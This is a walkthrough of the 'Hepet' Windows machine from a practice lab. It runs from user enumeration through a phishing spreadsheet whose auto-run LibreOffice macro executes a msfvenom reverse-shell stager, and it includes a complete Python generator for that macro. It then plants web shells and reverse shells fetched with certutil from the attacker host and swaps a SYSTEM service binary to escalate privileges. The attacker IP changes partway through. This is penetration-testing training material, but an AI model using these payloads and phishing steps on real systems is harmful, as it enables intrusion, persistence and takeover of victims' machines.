Proving Grounds Practice - Hepet Walkthrough Guide
Written on
Machine Name: Hepet
Machine Type: Windows
Difficulty: Intermediate
Machine IP: 192.168.244.140
Local Kali IP: 192.168.45.241
Enumeration
Nmap Results
autorecon 192.168.244.140
Port 79
The finger service leaks valid account names, so brute-force the name list and keep only the hits.
~/Desktop/tools/finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.244.140 | grep -v 'is not known'
Port 8000
The web page on port 8000 lists several usernames. This confirms the data from finger on port 79. Add them to user.txt.
nano user.txt
admin
agnes
charlotte
jonas
magnus
martha
ela
Check the web content.
curl -s http://192.168.244.140:8000/ | html2markdown
The page contains the string SicMundusCreatusEst, which appears to be a password; it works for jonas against IMAP below.
Credentials: jonas:SicMundusCreatusEst
Port 143
Let's examine the emails over IMAP with a raw session (the same tag is reused for every command, which the server tolerates).
nc 192.168.244.140 143
tag login jonas@localhost SicMundusCreatusEst
tag LIST "" "*"
tag SELECT INBOX
tag STATUS INBOX (MESSAGES)
tag fetch 1 (BODY[1])
tag fetch 2:5 (BODY[HEADER] BODY[1])
The emails show that mailadmin@localhost reviews spreadsheets sent to that mailbox. The software in use is likely LibreOffice, so .ods (and .xls) attachments should be opened, which makes a spreadsheet carrying an auto-run macro a plausible phishing vector.
Create a macro payload. The hta-psh format yields a single base64-encoded PowerShell one-liner that we will embed in the macro.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=4444 -f hta-psh -o evil.hta
Open evil.hta, copy the powershell.exe ... -e <payload> command out of it, and split it into pieces, because a LibreOffice Basic line cannot hold the whole base64 blob as one literal.
nano splitter.py
# Paste the full powershell command from evil.hta in place of <payload>.
s = "powershell.exe -nop -w hidden -e <payload>"
n = 50  # characters per Basic string literal
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    # Each line appends one piece; the macro concatenates them back into s.
    print('Str = Str + "' + chunk + '"')
Create a new .ods file in LibreOffice Calc, open Tools > Macros > Edit Macros, and paste the generated Str lines into a Sub that finishes by executing the reassembled string with Shell(Str).
Make the macro run as soon as the spreadsheet is opened: Tools > Customize > Events, assign the Sub to the Open Document event, and save the assignment in the document rather than in LibreOffice.
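The macro-building steps above, as an added example that is not part of the original walkthrough: this script reads the .hta that msfvenom produced, pulls out the PowerShell stager, splits it the way splitter.py does, and wraps the pieces in a complete Basic Sub. The regex that locates the stager, the Sub Main / Shell(Str) skeleton, and the embedded sample .hta text are assumptions and constructed input, not taken from the page.

```python
#!/usr/bin/env python3
"""Build a LibreOffice Basic auto-run macro from the PowerShell stager in an
msfvenom -f hta-psh file.

Added example for this walkthrough, not the original splitter.py. Marked
assumptions: the regex used to find the stager in the .hta, and the
Sub Main / Shell(Str) skeleton that the generated Str lines are wrapped in.
"""
import re
import sys

# Assumption: hta-psh embeds the stager as one
# "powershell.exe -nop -w hidden -e <base64>" string inside a quoted VBScript
# argument, so we stop at the first quote character.
STAGER_RE = re.compile(r'powershell(?:\.exe)?[^"\']*-e\s+[A-Za-z0-9+/=]+')

# Constructed stand-in for evil.hta; a real payload blob is several KB of base64.
SAMPLE_HTA = (
    '<script language="VBScript">\n'
    'Set o = CreateObject("Wscript.Shell")\n'
    'o.Run "powershell.exe -nop -w hidden -e QUFBQQ==", 0, False\n'
    "</script>\n"
)


def extract_stager(hta_text: str) -> str:
    """Return the powershell one-liner embedded in the .hta text."""
    m = STAGER_RE.search(hta_text)
    if not m:
        raise ValueError("no powershell -e stager found in .hta")
    return m.group(0)


def chunk(s: str, n: int = 50) -> list[str]:
    """Split s into pieces of at most n characters. Basic will not take the whole
    base64 blob as one literal, so each piece becomes its own Str = Str + line."""
    if n <= 0:
        raise ValueError("chunk size must be positive")
    return [s[i:i + n] for i in range(0, len(s), n)]


def build_macro(cmd: str, n: int = 50, sub_name: str = "Main") -> str:
    """Wrap the chunked command in a Basic Sub that reassembles and runs it.
    Assumption: the Dim / concatenation / Shell skeleton commonly used for
    LibreOffice auto-run macros; the page only shows the Str lines."""
    body = [f"Sub {sub_name}",
            "    Dim Str As String",
            '    Str = ""']
    body += [f'    Str = Str + "{piece}"' for piece in chunk(cmd, n)]
    body += ["    Shell(Str)", "End Sub"]
    return "\n".join(body)


def reassemble(macro: str) -> str:
    """Inverse check: join the quoted pieces back into one command so a generated
    macro can be verified against the stager it was built from."""
    pieces = re.findall(r'Str = Str \+ "(.*)"$', macro, flags=re.M)
    return "".join(pieces)


def main(argv: list[str]) -> int:
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HTA
    cmd = extract_stager(text)
    macro = build_macro(cmd)
    if reassemble(macro) != cmd:
        raise RuntimeError("chunking lost part of the stager")
    print(macro)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as python3 build_macro.py evil.hta (the file name is my choice), paste the printed Sub into Tools > Macros > Edit Macros, and bind Main to the Open Document event. The reassemble check matters: a chunk boundary that drops or duplicates a character silently breaks the base64 and the stager never runs.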
Start the listener first, then send the file by email to the account that handles spreadsheets.
nc -nvlp 4444
sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.244.140:25 -u 'a spreadsheet' -m 'Please check this spreadsheet' -a exploit.ods
After a prolonged wait, someone opened the spreadsheet, the macro fired, and the reverse shell connected to the listener.
Privilege Escalation
Before enumerating further, stage a second reverse shell and a PHP web shell in the XAMPP web root so access can be regained if this session drops.
cd C:\xampp\htdocs
certutil -urlcache -split -f http://192.168.45.192/rev.exe
certutil -urlcache -split -f http://192.168.45.192/shell.pHp
Upload WinPEAS and run it.
certutil -urlcache -split -f http://192.168.45.192/wps.exe
WinPEAS turns up a non-standard service. A running process named veyon-service.exe stands out because its binary lives inside the current user's own profile, under a Veyon directory, rather than in Program Files. Let's investigate the service that starts it.
sc qc VeyonService
The service runs as LocalSystem. A SYSTEM service whose executable sits in a user-writable location means whoever can overwrite that file gets SYSTEM the next time the service starts.
Let's substitute the binary at C:\Users\Ela Arwel\Veyon\veyon-service.exe with a reverse shell. Keep the original so it can be restored, and confirm you can actually write to the directory before overwriting anything. The reboot is what restarts the service and launches our binary.
# on kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.192 LPORT=5555 -f exe -o veyon-service.exe
nc -nvlp 5555
# on victim Windows
cd "C:\Users\Ela Arwel\Veyon"
move veyon-service.exe veyon-service.bak
certutil -f -urlcache http://192.168.45.192:80/veyon-service.exe veyon-service.exe
shutdown /r
After the reboot, VeyonService starts our replacement binary and the listener on port 5555 receives a shell running as SYSTEM. Mission accomplished!